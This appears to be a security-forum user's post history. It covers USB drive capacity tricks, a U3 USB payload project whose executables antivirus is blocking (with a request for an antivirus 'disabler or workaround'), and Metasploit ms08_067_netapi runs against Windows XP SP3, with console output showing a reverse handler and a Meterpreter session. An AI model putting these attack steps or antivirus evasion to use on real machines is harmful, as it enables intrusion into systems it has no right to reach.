Jump to content

misfitsman805

Active Members
  • Posts

    160
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by misfitsman805

  1. Not quite so. Cheap memory stick manufacturers that produce 2GB, 4GB, 8GB (etc.) variants of the same drive will some times limit the space in the software on the drive because it's cheaper than using different memory chips. Sometimes they achieve this by leaving the sectors available the same but increasing/decreasing the physical sector size which causes other problems. However... 8GB to 130GB... that isn't right, 8GB to 16GB maybe (assuming that there is a 16GB model of the drive).

    Sounds just like CPU and GPU manufacturing companies.

    Say they make a Quad core CPU and it doesn't meet there quality inspection for it. So instead of tossing the whole CPU and lose money on it they will disable the "bad" core of the cpu and sell it as a Tri core cpu. Or at least that's how I think it works. :P Correct me if I am wrong. :)

  2. I sent my code to Sable, he hasn't replied though.

    At the moment the code is working perfectly on a U3, with the programs on the CD partition and the logs and config on the USB. The only problem now is that the anti-virus's are preventing the .exe's from running. They aren't deleted though, they just can't run. So we need a Virus disabler or workaround at the moment.

    Nice! That sounds pretty sweet!

  3. this thread should be stickied.

    I agree on this also. :)

    +1

    Edit: Is this project still being worked on?

  4. It was not, I rarely, if every, update VMs. After updating to test it, I also updated my BT4 install/metasploit, and now metasploit won't run. So I'll take your word that ms08_067 won't work on a fully patched XP SP3 machine, but for those wondering, it works on an un-patched one =P.

    oh ok I gotcha :)

  5. uh huh

    msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse handler on 192.168.1.106:4444

    [*] Automatically detecting the target...

    [*] Fingerprint: Windows XP Service Pack 3 - lang:English

    [*] Selected Target: Windows XP SP3 English (NX)

    [*] Attempting to trigger the vulnerability...

    [*] Sending stage (748544 bytes) to 192.168.1.181

    [*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.181:1072) at 2010-08-20 12:27:54 -0600

    meterpreter >

    Was this box fully patched?

  6. ms08_067_netapi I believe still works on SP3

    [*] Started reverse handler on 10.10.1.41:4444

    [*] Automatically detecting the target...

    [*] Fingerprint: Windows XP Service Pack 3 - lang:English

    [*] Selected Target: Windows XP SP3 English (NX)

    [*] Attempting to trigger the vulnerability...

    [*] Exploit completed, but no session was created.

    msf exploit(ms08_067_netapi) >

    fail :| lol

×
×
  • Create New...